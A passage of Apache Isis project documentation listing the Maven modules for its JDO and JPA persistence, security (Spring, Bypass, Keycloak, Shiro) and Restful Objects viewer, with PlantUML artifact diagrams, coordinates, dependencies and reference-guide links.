+\norg.datanucleus:datanucleus-jdo-query:jar:<managed> +\norg.datanucleus:datanucleus-jodatime:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.springframework.boot:spring-boot-starter-jdbc:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/datanucleus\/IsisModuleJdoDatanucleus.adoc[IsisModuleJdoDatanucleus], xref:refguide:persistence:index\/jdo\/datanucleus\/changetracking\/JdoLifecycleListener.adoc[JdoLifecycleListener], xref:refguide:persistence:index\/jdo\/datanucleus\/dialect\/DnJdoDialect.adoc[DnJdoDialect], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusIdLong.adoc[Persistable_datanucleusIdLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionLong.adoc[Persistable_datanucleusVersionLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionTimestamp.adoc[Persistable_datanucleusVersionTimestamp], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_downloadJdoMetadata.adoc[Persistable_downloadJdoMetadata], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisBookmarkConverter.adoc[IsisBookmarkConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisLocalResourcePathConverter.adoc[IsisLocalResourcePathConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisMarkupConverter.adoc[IsisMarkupConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisPasswordConverter.adoc[IsisPasswordConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/image\/JavaAwtBufferedImageByteArrayConverter.adoc[JavaAwtBufferedImageByteArrayConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisChangesDtoConverter.adoc[IsisChangesDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisCommandDtoConverter.adoc[IsisCommandDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisInteractionDtoConverter.adoc[IsisInteractionDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisOidDtoConverter.adoc[IsisOidDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoOffsetTimeConverter.adoc[IsoOffsetTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoZonedDateTimeConverter.adoc[IsoZonedDateTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/valuemappings\/applib\/ByteArrayBlobRdbmsMapping.adoc[ByteArrayBlobRdbmsMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisBlobMapping.adoc[IsisBlobMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisClobMapping.adoc[IsisClobMapping]\n****\n\n|Apache Isis Persistence - JDO (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-integration\nType: jar\nDirectory: \/persistence\/jdo\/integration\n----\n|JDO Integration (powered by DataNucleus)\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-spring:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-metamodel\nType: jar\nDirectory: \/persistence\/jdo\/metamodel\n----\n|JDO Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jdo.metamodel.JdoProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (provider)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-provider\nType: jar\nDirectory: \/persistence\/jdo\/provider\n----\n|JDO Provider to be implemented by any actual JDO provider eg. DataNucleus.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (Spring)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-spring\nType: jar\nDirectory: \/persistence\/jdo\/spring\n----\n|JDO Spring integration.\n\nThis is a fork of the Spring ORM JDO sources at github,\nfor which support had been dropped back in 2016 [1].\n\nCredits to the original authors. See also docs [2].\n\n[1] https:\/\/github.com\/spring-projects\/spring-framework\/issues\/18702\n[2] https:\/\/docs.spring.io\/spring-framework\/docs\/3.0.0.RC2\/reference\/html\/ch13s04.html\n\n.Dependencies\n****\njavax.servlet:javax.servlet-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n|===\n\n=== JPA\n\n[plantuml,JPA,svg]\n----\n@startuml(id=JPA)\ntitle JPA - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JPA\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JPA (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JPA (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JPA (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JPA EclipseLink\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JPA)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa\nType: pom\nDirectory: \/persistence\/jpa\n----\n|Apache Isis JPA integration\n\n|Apache Isis Persistence - JPA (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-applib\nType: jar\nDirectory: \/persistence\/jpa\/applib\n----\n|Supplementary applib for JPA persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/applib\/integration\/JpaEntityInjectionPointResolver.adoc[JpaEntityInjectionPointResolver], xref:refguide:persistence:index\/jpa\/applib\/services\/JpaSupportService.adoc[JpaSupportService]\n****\n\n|Apache Isis Persistence - JPA EclipseLink\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-eclipselink\nType: jar\nDirectory: \/persistence\/jpa\/eclipselink\n----\n|EclipseLink integration. Sets up EclipseLink as the implementation provider for Spring Data JPA.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-integration:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.jpa:jar:2.7.8 +\norg.springframework.boot:spring-boot-starter-data-jpa:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/eclipselink\/IsisModuleJpaEclipselink.adoc[IsisModuleJpaEclipselink]\n****\n\n|Apache Isis Persistence - JPA (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-integration\nType: jar\nDirectory: \/persistence\/jpa\/integration\n----\n|JPA integration (facets, jpa-context)\n\n.Components\n****\no.a.i.persistence.jpa.integration.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-metamodel:jar:<managed> +\norg.springframework.data:spring-data-jpa:jar:<managed> +\n****\n\n|Apache Isis Persistence - JPA (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-metamodel\nType: jar\nDirectory: \/persistence\/jpa\/metamodel\n----\n|JPA Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jpa.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\n****\n|===\n\n== Security\n\n[plantuml,Security,svg]\n----\n@startuml(id=Security)\ntitle Security - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Security\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Spring\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Security)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Spring\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-spring\nType: jar\nDirectory: \/security\/spring\n----\n|Authentication using Spring Security\n\n.Components\n****\no.a.i.security.spring.authentication.AuthenticatorSpring +\no.a.i.security.spring.webmodule.WebModuleSpringSecurity +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework.boot:spring-boot-starter-security:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/spring\/IsisModuleSecuritySpring.adoc[IsisModuleSecuritySpring], xref:refguide:security:index\/spring\/authentication\/AuthenticatorSpring.adoc[AuthenticatorSpring], xref:refguide:security:index\/spring\/webmodule\/SpringSecurityFilter.adoc[SpringSecurityFilter], xref:refguide:security:index\/spring\/webmodule\/WebModuleSpringSecurity.adoc[WebModuleSpringSecurity]\n****\n|===\n\n=== Bypass\n\n[plantuml,Bypass,svg]\n----\n@startuml(id=Bypass)\ntitle Bypass - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Bypass\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Bypass\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Bypass)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Bypass\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-bypass\nType: jar\nDirectory: \/security\/bypass\n----\n|.Components\n****\no.a.i.security.bypass.authentication.AuthenticatorBypass +\no.a.i.security.bypass.authorization.AuthorizorBypass +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/bypass\/IsisModuleSecurityBypass.adoc[IsisModuleSecurityBypass], xref:refguide:security:index\/bypass\/authentication\/AuthenticatorBypass.adoc[AuthenticatorBypass], xref:refguide:security:index\/bypass\/authorization\/AuthorizorBypass.adoc[AuthorizorBypass]\n****\n|===\n\n=== Keycloak\n\n[plantuml,Keycloak,svg]\n----\n@startuml(id=Keycloak)\ntitle Keycloak - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Keycloak\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Keycloak\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Keycloak)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Keycloak\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-keycloak\nType: jar\nDirectory: \/security\/keycloak\n----\n|Authentication and Authorization using Keycloak\n\n.Components\n****\no.a.i.security.keycloak.authentication.AuthenticatorKeycloak +\no.a.i.security.keycloak.webmodule.WebModuleKeycloak +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/keycloak\/IsisModuleSecurityKeycloak.adoc[IsisModuleSecurityKeycloak], xref:refguide:security:index\/keycloak\/authentication\/AuthenticatorKeycloak.adoc[AuthenticatorKeycloak], xref:refguide:security:index\/keycloak\/webmodule\/KeycloakFilter.adoc[KeycloakFilter], xref:refguide:security:index\/keycloak\/webmodule\/WebModuleKeycloak.adoc[WebModuleKeycloak]\n****\n|===\n\n=== Shiro\n\n[plantuml,Shiro,svg]\n----\n@startuml(id=Shiro)\ntitle Shiro - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Shiro\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Shiro\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Shiro)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Shiro\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-shiro\nType: jar\nDirectory: \/security\/shiro\n----\n|Authentication and Authorization using Apache Shiro.\n\n.Components\n****\no.a.i.security.shiro.authentication.AuthenticatorShiro +\no.a.i.security.shiro.authorization.AuthorizorShiro +\no.a.i.security.shiro.webmodule.WebModuleShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.shiro:shiro-core:jar:<managed> +\norg.apache.shiro:shiro-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/shiro\/IsisModuleSecurityShiro.adoc[IsisModuleSecurityShiro], xref:refguide:security:index\/shiro\/authentication\/AuthenticatorShiro.adoc[AuthenticatorShiro], xref:refguide:security:index\/shiro\/authorization\/AuthorizorShiro.adoc[AuthorizorShiro], xref:refguide:security:index\/shiro\/authorization\/IsisPermission.adoc[IsisPermission], xref:refguide:security:index\/shiro\/authorization\/IsisPermissionResolver.adoc[IsisPermissionResolver], xref:refguide:security:index\/shiro\/webmodule\/WebModuleShiro.adoc[WebModuleShiro]\n****\n|===\n\n== Viewer\n\n[plantuml,Viewer,svg]\n----\n@startuml(id=Viewer)\ntitle Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Common Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Common Model\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-common\nType: jar\nDirectory: \/viewers\/common\n----\n|.Components\n****\no.a.i.viewer.common.model.branding.BrandingUiModelProvider +\no.a.i.viewer.common.model.header.HeaderUiModelProvider +\no.a.i.viewer.common.model.menu.MenuUiModelProvider +\no.a.i.viewer.common.model.userprofile.UserProfileUiModelProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.webjars:font-awesome:jar:5.15.2 +\n****\n|===\n\n=== Restful Objects\n\n[plantuml,Restful Objects,svg]\n----\n@startuml(id=Restful_Objects)\ntitle Restful Objects - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Restful Objects\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - RO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - RO (AppLib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - RO (JAX-RS Resteasy v4)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - RO (Rendering)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Viewer - RO (Testing)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Viewer - RO (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Restful Objects)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - RO\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects\nType: pom\nDirectory: \/viewers\/restfulobjects\n----\n|\n\n|Apache Isis Viewer - RO (AppLib)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-applib\nType: jar\nDirectory: \/viewers\/restfulobjects\/applib\n----\n|.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/applib\/IsisModuleViewerRestfulObjectsApplib.adoc[IsisModuleViewerRestfulObjectsApplib], xref:refguide:viewer:index\/restfulobjects\/applib\/JsonRepresentation.adoc[JsonRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/LinkRepresentation.adoc[LinkRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/Rel.adoc[Rel], xref:refguide:viewer:index\/restfulobjects\/applib\/RelDefinition.adoc[RelDefinition], xref:refguide:viewer:index\/restfulobjects\/applib\/RepresentationType.adoc[RepresentationType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulHttpMethod.adoc[RestfulHttpMethod], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulMediaType.adoc[RestfulMediaType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulRequest.adoc[RestfulRequest], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulResponse.adoc[RestfulResponse], xref:refguide:viewer:index\/restfulobjects\/applib\/boot\/BootstrapResource.adoc[BootstrapResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/AbstractObjectMemberRepresentation.adoc[AbstractObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ActionResultRepresentation.adoc[ActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectMemberRepresentation.adoc[DomainObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectRepresentation.adoc[DomainObjectRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectResource.adoc[DomainObjectResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainRepresentation.adoc[DomainRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainServiceResource.adoc[DomainServiceResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ListRepresentation.adoc[ListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectActionRepresentation.adoc[ObjectActionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectCollectionRepresentation.adoc[ObjectCollectionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectPropertyRepresentation.adoc[ObjectPropertyRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ScalarValueRepresentation.adoc[ScalarValueRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/AbstractTypeMemberRepresentation.adoc[AbstractTypeMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionDescriptionRepresentation.adoc[ActionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionParameterDescriptionRepresentation.adoc[ActionParameterDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/CollectionDescriptionRepresentation.adoc[CollectionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeRepresentation.adoc[DomainTypeRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeResource.adoc[DomainTypeResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/PropertyDescriptionRepresentation.adoc[PropertyDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeActionResultRepresentation.adoc[TypeActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeListRepresentation.adoc[TypeListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/dtos\/ScalarValueDtoV2.adoc[ScalarValueDtoV2], xref:refguide:viewer:index\/restfulobjects\/applib\/errors\/ErrorRepresentation.adoc[ErrorRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthRepresentation.adoc[HealthRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthResource.adoc[HealthResource], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageRepresentation.adoc[HomePageRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageResource.adoc[HomePageResource], xref:refguide:viewer:index\/restfulobjects\/applib\/menubars\/MenuBarsResource.adoc[MenuBarsResource], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserRepresentation.adoc[UserRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserResource.adoc[UserResource], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonMapper.adoc[JsonMapper], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonNodeUtils.adoc[JsonNodeUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/MediaTypes.adoc[MediaTypes], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/Parser.adoc[Parser], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/PathNode.adoc[PathNode], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/UrlEncodingUtils.adoc[UrlEncodingUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionRepresentation.adoc[VersionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionResource.adoc[VersionResource]\n****\n\n|Apache Isis Viewer - RO (JAX-RS Resteasy v4)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-jaxrsresteasy4\nType: jar\nDirectory: \/viewers\/restfulobjects\/jaxrs-resteasy-4\n----\n|JAX-RS plugin using jboss resteasy.\n\n.Components\n****\no.a.i.viewer.restfulobjects.jaxrsresteasy4.conneg.RestfulObjectsJaxbWriterForXml +\no.a.i.viewer.restfulobjects.jaxrsresteasy4.webmodule.WebModuleJaxrsResteasy4 +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-testing:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jboss.resteasy:resteasy-jaxb-provider:jar:<managed> +\norg.jboss.resteasy:resteasy-spring-boot-starter:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/IsisModuleViewerRestfulObjectsJaxrsResteasy4.adoc[IsisModuleViewerRestfulObjectsJaxrsResteasy4], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/conneg\/RestfulObjectsJaxbWriterForXml.adoc[RestfulObjectsJaxbWriterForXml], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/webmodule\/WebModuleJaxrsResteasy4.adoc[WebModuleJaxrsResteasy4]\n****\n\n|Apache Isis Viewer - RO (Rendering)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-rendering\nType: jar\nDirectory: \/viewers\/restfulobjects\/rendering\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.rendering.domainobjects.JsonValueEncoder +\no.a.i.viewer.restfulobjects.rendering.service.RepresentationService +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$RequestFilter +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$ResponseFilter +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceForRestfulObjectsV1_0 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV1 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV2 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceXRoDomainType 